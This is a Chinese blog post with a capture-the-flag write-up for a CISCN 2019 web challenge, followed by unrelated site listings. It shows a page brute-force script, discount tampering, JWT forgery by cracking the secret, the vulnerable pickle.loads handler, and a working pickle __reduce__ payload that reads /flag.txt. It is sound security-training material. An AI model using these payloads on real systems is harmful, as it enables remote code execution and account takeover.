CTF ciscn_2019_web_northern_china_day1_web2

于 2024-09-29 19:04:43 发布
阅读量191 收藏 3
点赞数 2
分类专栏: CTF刷题记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73547627/article/details/142630620
版权

ciscn_2019_web_northern_china_day1_web2

BEGIN

拿到题目,先看看
在这里插入图片描述
这里发现一个很像提示的东西,然后发现下面是一堆小电视商品,有lv等级和金钱,所以这题的入口可能就是再lv6和这个资金募集上
然后点击下next,看看页数的参数,然后爆破一下(注意看看lv信息是怎么显示的,这里是图片名

爆破lv6

import requests

url = 'http://192.168.163.128:8083/shop?page='

for i in range(1, 1000):
    r = requests.get(url + str(i))
    if 'lv6.png' in r.text:
        print(i)
        break

爆破出结果是181
然后就购买但是金额不够(记得注册登录
然后看到有折扣,就抓包试试能不能改

抓包修改折扣

change discount
修改完后,发现返回一个Location(主要也没别的信息了(毕竟也不是404,502啥的
然后就访问url\blg_m4mber
然后⬇️
在这里插入图片描述

JWT伪造

怎么越权呢,先抓个包
然后发现有JWT::Json web token (JWT)
直达➡️JWT伪造

在这里插入图片描述
然后就复现一下JWT伪造,把secret key爆破出来
把JWT换成自己的
在这里插入图片描述
然后到https://jwt.io/生成一下(先放原有的然后修改user和secret key,就ok了)
生成伪造的JWT
在这里插入图片描述
这里还卡了一下,因为我是把JWT用burp传的,然后看不到提示信息(burp raw不支持中文 😢

康康wp,F12开始操作

在这里插入图片描述
在这里插入图片描述
然后下载源码然后又卡住了

代码审计

漏洞:pickle.loads unserialize执行魔术方法造成rce

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

payload

注意到,urllib.unquote()python2的用法,python3中使用urllib.parse.unquote()

#!/usr/bin/env python2.7
import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

然后通过become传参

还好不是只能在源码里看,一开始真没在raw中找到,然后就render看看,毕竟都200OK了结果没看到flag 😓
卡挺久的

在这里插入图片描述

OVER

抓包+JWT+pickle反序列化RCE

Tolalal
关注
专栏目录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
DS_Store 文件泄露
07-11
DS_Store 文件泄露 是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。 .DS_Store是Mac下Finder用来保存如何展示文件/文件夹 的数据文件(即文件夹的显示属性的,和比文件图标的摆放...
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8479
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于C语言的Dao编程语言设计源码
09-28
该项目是一款名为Dao的编程语言设计源码,采用C语言为主要开发语言,并辅以C、C++、Shell和CSS等语言。项目文件共计225个,其中包含126个Dao源文件、39个C源文件、36个C头文件、9个C++源文件、3个文本文件、2个Vim配置文件、1个ChangeLog文件、1个daomake工具文件、1个README文件、1个配置文件。这个项目旨在构建一个高效、可扩展的编程语言环境。
如何自定义数据集进行目标检测_keras-yolo3.zip
09-28
如何自定义数据集进行目标检测_keras-yolo3
基于JavaScript及多语言融合的勤工俭学平台设计源码
09-28
本项目是一款基于JavaScript及多语言融合的勤工俭学平台设计源码,共计367个文件,涵盖231个Java源代码文件、27个XML配置文件、23个JavaScript文件、19个CSS文件、8个PNG图像文件以及少量其他类型文件。该平台旨在为勤工俭学活动提供高效便捷的解决方案,支持多种语言的交互,满足不同用户的需求。
初始化对LoRA微调动态的影响研究
09-28
内容概要:研究了低秩适应(Low Rank Adaptation, LoRA)方法下不同随机初始化设置的效果与动态特性。论文主要发现,在初始化矩阵B为零、矩阵A随机时,模型通常可以使用更大的学习率并取得较好的效果,但这种情况下会出现内部不稳定现象。然而当A被初始化为零而B随机时,则不具备上述优势。通过理论和大量实验证明,初始化选择A而非B将导致更好的优化结果与训练稳定性。 适合人群:机器学习、神经网络的研究员、深度学习领域的科研学者。 使用场景及目标:在大规模语义模型的参数调整过程中选择恰当的初始化配置,从而提升效率以及性能。对于LoRA微调任务来说,在有限算力条件下高效地利用少量新增训练参数进行自适座行动。 其他说明:文中提出的结论有助于未来改进基于小样本学习的任务,同时指出了目前两种初始化方式均存在缺陷,提示可能需要进一步的研究来解决这些问题。尽管当前方法表现优于默认的LoRA初始化,但仍有一定局限性和潜在改进方向。
【PFJSP问题】基于matlab豪猪算法CPO求解置换流水车间调度问题PFSP【含Matlab源码 7895期】.mp4
09-28
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
IGWO-SVM:改良的灰狼优化算法改进支持向量机 采用三种改进思路:两种Logistic和Tent混沌映射和采用DIH策略
09-28
IGWO-SVM:改良的灰狼优化算法改进支持向量机。 采用三种改进思路:两种Logistic和Tent混沌映射和采用DIH策略。 采用基于DIH维度学习的狩猎搜索策略为每只狼构建邻域,增强局部和全局搜索能力,收敛速度比GWO更快,适用于paper。
Spring-dbUtil-xml-proxy
09-28
动态代理的应用
HCIE-Security V2.0培训材料
09-28
HCIE-Security V2.0培训材料 01 信息安全管理技术 前言00安全、信息安全、网络安全 01 第一章 安全认证概述 02 第二章 信息安全防范与趋势 03 第三章 信息安全管理 04 第四章 隐私保护 02 安全攻击与防御技术 01 第一章 安全攻防概述 02 第二章 信息收集与网络探测 03 第三章 内容安全过滤技术 04 第四章 Web安全技术 05 第五章 病毒防范技术 06 第七章 DDoS攻击与防御 06 第六章 网络入侵与防御技术 08 第八章 主机安全与加固 09 第九章 数据安全 03 安全组网部署 01 第一章 典型安全组网设计 02 第二章 防火墙技术综合应用 03 第三章 用户管理技术 04 第四章 IPV6安全技术 04 云安全 01 第一章 云数据中心网络安全技术 02 第二章 华为云安全架构设计 05 安全运营与分析 01 第一章 安全运维操作概述 02 第二章 日志管理 03 第三章 安全审计技术 04 第四章 态势感知技术(CIS) 05 第五章 华为HiSec解决方案
基于STM32单片机智能药盒定时吃药喂水蓝牙APP设计(毕业设计)
09-28
系统构成: 本设计由STM32单片机+3个LED灯指示电路+3个到位开关检测电路+1个蜂鸣器报警电路+蓝牙模块电路+电源电路组成。 系统功能: 1、药盒底部安装LED灯,可以在APP终端上设定吃药的时间(3个定时时间) 2、每天吃药时间一到。相应盒子(一共3个盒子)的LED灯将会自动亮起,同时蜂鸣器报警。 2、药盒被打开后,到位开关检测到信号,并将信号通过蓝牙发送到手机,可以通过APP查看每天的吃药情况。 资料包含: 程序源码 电路图 任务书 答辩技巧 开题报告 参考论文 系统框图 程序流程图 使用到的芯片资料 器件清单 中期报告 蓝牙手机app 等等资料
基于Python的InsightFace 2D/3D人脸分析项目设计源码
09-28
本项目为InsightFace 2D/3D人脸分析项目设计源码,采用Python为主要开发语言,辅以C++, C, Shell等多种语言,整体包含1315个文件,涵盖872个Python源代码文件、94个Markdown文档、71个C++源文件、65个C头文件、49个Shell脚本、45个JPG图像文件、25个TXT文本文件、13个Python pickle文件、12个PNG图像文件、9个JPEG图像文件。该项目旨在进行高效的人脸分析处理,适用于各种人脸识别和追踪应用场景。
ssm9229基于SSM的高校学生综合素质评价系统.zip
最新发布
09-28
技术选型 【后端】:Java 【框架】:ssm 【前端】:vue/jsp 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 包含:项目源码、数据库脚本、项目功能介绍文档等,该项目源码可作为毕设使用。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章
com.famousbluemedia.piano.Spec.apk
09-28
com.famousbluemedia.piano.Spec.apk
基于JavaScript及多语言技术的课程考评系统设计源码
09-28
该项目是一款基于JavaScript核心技术的课程考评系统,源码包含多种编程语言和文件类型,总计7187个文件。其中,PHP文件2779个,JavaScript文件1577个,GIF图片399个,Excel文件398个,HTML文件312个,LESS样式表263个,CSS样式表208个,PNG图片181个,Markdown文件172个,JSON文件151个。该系统由郭力老师指导开发,支持多语言技术,适用于教学考评场景。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值